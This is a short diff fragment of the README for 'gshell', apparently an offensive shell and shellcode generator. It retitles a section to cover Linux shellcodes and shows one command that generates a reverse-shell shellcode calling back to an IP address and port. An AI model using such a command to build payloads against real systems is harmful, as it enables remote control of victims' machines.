trhacknon/gshell/README.md

 ```

-## Example of Shellcodes
+## Example of Linux Shellcodes

-Here is an example of a shellcode:
+Here is an example of a linux shellcode:

 ```sh
 PS C:\gshell> python .\gshell.py -i 192.168.220.131 -p 4433 --shellcode --srev --linux